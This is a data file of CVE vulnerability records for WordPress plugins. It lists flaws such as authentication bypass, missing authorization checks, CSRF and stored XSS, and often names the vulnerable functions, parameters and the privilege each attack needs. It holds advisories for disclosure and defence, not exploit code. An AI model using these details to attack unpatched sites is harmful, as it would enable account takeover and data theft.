{"CVE_ID":"CVE-2024-4552","slug":"social-login-lite-for-woocommerce","versionImpact":"1.6.0","description":"The Social Login Lite For WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.6.0. This is due to insufficient verification on the user being supplied during the social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f91d6ad6-82fc-4507-90e2-aedfff26bac5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f91d6ad6-82fc-4507-90e2-aedfff26bac5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-login-lite-for-woocommerce\\\/tags\\\/1.6.0\\\/woocommerce_social_login.php#L499\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-login-lite-for-woocommerce\\\/tags\\\/1.6.0\\\/woocommerce_social_login.php#L499\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4450","slug":"ali2woo-lite","versionImpact":"3.3.5","description":"The AliExpress Dropshipping with AliNext Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions in the ImportAjaxController.php file in all versions up to, and including, 3.3.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several actions like importing and modifying products.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01836c2c-0976-493e-8b13-1c7c702d1d2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01836c2c-0976-493e-8b13-1c7c702d1d2c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ali2woo-lite\\\/trunk\\\/includes\\\/classes\\\/controller\\\/ImportAjaxController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ali2woo-lite\\\/trunk\\\/includes\\\/classes\\\/controller\\\/ImportAjaxController.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7690","slug":"dn-popup","versionImpact":"1.2.2","description":"The DN Popup WordPress plugin through 1.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1f941d51-1eaf-424a-95b8-ccaa3fdd339b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1f941d51-1eaf-424a-95b8-ccaa3fdd339b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4448","slug":"kaswara","versionImpact":"3.0.1","description":"The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf76527-9a11-4755-992c-02fbc1a79bae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf76527-9a11-4755-992c-02fbc1a79bae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/kaswara-modern-visual-composer-addons\\\/19341477\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/kaswara-modern-visual-composer-addons\\\/19341477\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12515","slug":"masjidal","versionImpact":"1.8.8","description":"The Muslim Prayer Time-Salah\/Iqamah plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Masjid ID parameter in all versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/masjidal\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/masjidal\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e34b3df-ac18-4409-b8fe-b27c931f3aa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e34b3df-ac18-4409-b8fe-b27c931f3aa3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12586","slug":"chalet-montagne-com-tools","versionImpact":"2.7.8","description":"The Chalet-Montagne.com Tools WordPress plugin through 2.7.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ce05a44-762b-4aaf-b88a-92c830fd8ec4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ce05a44-762b-4aaf-b88a-92c830fd8ec4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13776","slug":"dzs-zoomsounds","versionImpact":"6.91","description":"The ZoomSounds - WordPress Wave Audio Player with Playlist plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'dzsap_delete_notice' AJAX action in all versions up to, and including, 6.91. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to 'seen' on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration. There are several other functions also vulnerable to missing authorization.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c8e538b-7157-42d3-abee-8259c6715cd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c8e538b-7157-42d3-abee-8259c6715cd5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3852","slug":"wpshop","versionImpact":"2.6.0","description":"The WPshop 2 \u2013 E-Commerce plugin for WordPress is vulnerable to privilege escalation via account takeover in versions 2.0.0 to 2.6.0. This is due to the plugin not properly validating a user's identity prior to updating their details like email & password through the update() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/\\\/core\\\/external\\\/eo-framework\\\/modules\\\/wpeo-model\\\/class\\\/user.class.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/\\\/core\\\/external\\\/eo-framework\\\/modules\\\/wpeo-model\\\/class\\\/user.class.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/\\\/modules\\\/api\\\/action\\\/class-api-action.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/\\\/modules\\\/api\\\/action\\\/class-api-action.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/core\\\/external\\\/eo-framework\\\/modules\\\/wpeo-model\\\/class\\\/rest.class.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/core\\\/external\\\/eo-framework\\\/modules\\\/wpeo-model\\\/class\\\/rest.class.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96b8186c-dfe9-4137-b28d-cc09a25aa9ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96b8186c-dfe9-4137-b28d-cc09a25aa9ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4781","slug":"accordion-shortcodes","versionImpact":"2.4.2","description":"The Accordion Shortcodes WordPress plugin through 2.4.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2803027-b822-4bf9-8d1d-6f538681af9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2803027-b822-4bf9-8d1d-6f538681af9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1341","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the ajax_deactivate function. This makes it possible for unauthenticated attackers to turn off caching via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d95b01c3-5db4-40ac-8787-0db58a9cc3a6\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d95b01c3-5db4-40ac-8787-0db58a9cc3a6\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0544","slug":"wp-login-box","versionImpact":"2.0.2","description":"The WP Login Box WordPress plugin through 2.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ef9585f-67d7-4651-977a-fcad113882bd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ef9585f-67d7-4651-977a-fcad113882bd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4379","slug":"woocommerce-multi-currency","versionImpact":"2.1.17","description":"The WooCommerce Multi Currency plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wmc_bulk_fixed_price function in versions up to, and including, 2.1.17. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to make changes to product prices.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2318ae9-4115-442e-9293-a9251787c5f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2318ae9-4115-442e-9293-a9251787c5f3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-currency\\\/20948446\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-currency\\\/20948446\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerability-fixed-in-wordpress-woocommerce-multi-currency-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerability-fixed-in-wordpress-woocommerce-multi-currency-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49833","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.7.9","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Spectra \u2013 WordPress Gutenberg Blocks allows Stored XSS. This issue affects Spectra \u2013 WordPress Gutenberg Blocks: from n\/a through 2.7.9.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ultimate-addons-for-gutenberg\\\/wordpress-spectra-plugin-2-7-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ultimate-addons-for-gutenberg\\\/wordpress-spectra-plugin-2-7-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1778","slug":"admin-side-data-storage-for-contact-form-7","versionImpact":"1.1.1","description":"The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_bookmark() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter bookmark statuses.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74040d0-1fee-4906-af6f-a5d842c42fd4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74040d0-1fee-4906-af6f-a5d842c42fd4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/class.ztdcfcf.admin.action.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/class.ztdcfcf.admin.action.php#L235\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3631","slug":"hl-twitter","versionImpact":"2014.1.18","description":"The HL Twitter WordPress plugin through 2014.1.18 does not have CSRF check when unlinking twitter accounts, which could allow attackers to make logged in admins perform such actions via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c59a8b49-6f3e-452b-ba9b-50b80c522ee9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c59a8b49-6f3e-452b-ba9b-50b80c522ee9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34801","slug":"seo-wordpress","versionImpact":"4.0.15","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mervin Praison Praison SEO WordPress allows Stored XSS.This issue affects Praison SEO WordPress: from n\/a through 4.0.15.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/seo-wordpress\\\/wordpress-praison-seo-wordpress-plugin-4-0-15-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/seo-wordpress\\\/wordpress-praison-seo-wordpress-plugin-4-0-15-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3984","slug":"embedalbum-pro","versionImpact":"1.1.29","description":"The EmbedSocial \u2013 Social Media Feeds, Reviews and Galleries plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'embedsocial_reviews' shortcode in all versions up to, and including, 1.1.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6593b0de-db7a-4b7e-bd74-cc2b1e36ac60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6593b0de-db7a-4b7e-bd74-cc2b1e36ac60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedalbum-pro\\\/trunk\\\/embedalbum_pro.php#L194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedalbum-pro\\\/trunk\\\/embedalbum_pro.php#L194\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9023","slug":"wp-webauthn","versionImpact":"1.3.1","description":"The WP-WebAuthn plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wwa_login_form shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77247a6b-2473-4b36-9ad8-b7802e4fad32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77247a6b-2473-4b36-9ad8-b7802e4fad32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-webauthn\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-webauthn\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-webauthn\\\/trunk\\\/wwa-shortcodes.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-webauthn\\\/trunk\\\/wwa-shortcodes.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-webauthn\\\/trunk\\\/blocks\\\/blocks.build.js#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-webauthn\\\/trunk\\\/blocks\\\/blocks.build.js#L1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10959","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.5","description":"The The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to arbitrary shortcode execution via woot_get_smth AJAX action in all versions up to, and including, 1.0.6.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1666\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199368\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199368\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profit-products-tables-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profit-products-tables-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecf803cf-1b9c-4d2e-863f-d1f51b08f833?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecf803cf-1b9c-4d2e-863f-d1f51b08f833?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12514","slug":"3dvieweronline-wp","versionImpact":"2.2.2","description":"The 3DVieweronline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's '3Dvo-model' shortcode in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3dvieweronline-wp\\\/trunk\\\/public\\\/class-threedvieweronline-iframe-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3dvieweronline-wp\\\/trunk\\\/public\\\/class-threedvieweronline-iframe-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/3dvieweronline-wp\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/3dvieweronline-wp\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee1c9c62-d5b5-4213-ae5a-d3d4e9103d15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee1c9c62-d5b5-4213-ae5a-d3d4e9103d15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23657","slug":"salesforce-wordpress-to-candidate","versionImpact":"1.0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound WordPress-to-candidate for Salesforce CRM allows Reflected XSS. This issue affects WordPress-to-candidate for Salesforce CRM: from n\/a through 1.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/salesforce-wordpress-to-candidate\\\/vulnerability\\\/wordpress-wordpress-to-candidate-for-salesforce-crm-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/salesforce-wordpress-to-candidate\\\/vulnerability\\\/wordpress-wordpress-to-candidate-for-salesforce-crm-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3851","slug":"smartpay","versionImpact":"2.7.13","description":"The Download Manager and Payment Form WordPress Plugin \u2013 WP SmartPay plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions 1.1.0 to 2.7.13 via the show() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view other users' data like email address, name, and notes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartpay\\\/tags\\\/2.7.13\\\/app\\\/Http\\\/Controllers\\\/Rest\\\/CustomerController.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartpay\\\/tags\\\/2.7.13\\\/app\\\/Http\\\/Controllers\\\/Rest\\\/CustomerController.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aade1bd-b69d-4134-a4f7-78372a291557?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aade1bd-b69d-4134-a4f7-78372a291557?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5529","slug":"advanced-page-visit-counter","versionImpact":"8.0.6","description":"The Advanced Page Visit Counter WordPress plugin before 8.0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/095c9c35-2618-4f90-8435-a3c34f0bb7f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/095c9c35-2618-4f90-8435-a3c34f0bb7f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5700","slug":"simple-logo-carousel","versionImpact":"1.9.3","description":"The Simple Logo Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/idesolutions\\\/simple-logo-carousel\\\/commit\\\/d995b5d35e0fdc0a59307ce664e4ce1158b69bff\",\"name\":\"https:\\\/\\\/github.com\\\/idesolutions\\\/simple-logo-carousel\\\/commit\\\/d995b5d35e0fdc0a59307ce664e4ce1158b69bff\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-logo-carousel\\\/trunk\\\/includes\\\/Base\\\/Shortcode.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-logo-carousel\\\/trunk\\\/includes\\\/Base\\\/Shortcode.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3312693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3312693\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-logo-carousel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-logo-carousel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b25f939c-1dfe-4d4f-a27a-1f9022da6965?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b25f939c-1dfe-4d4f-a27a-1f9022da6965?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
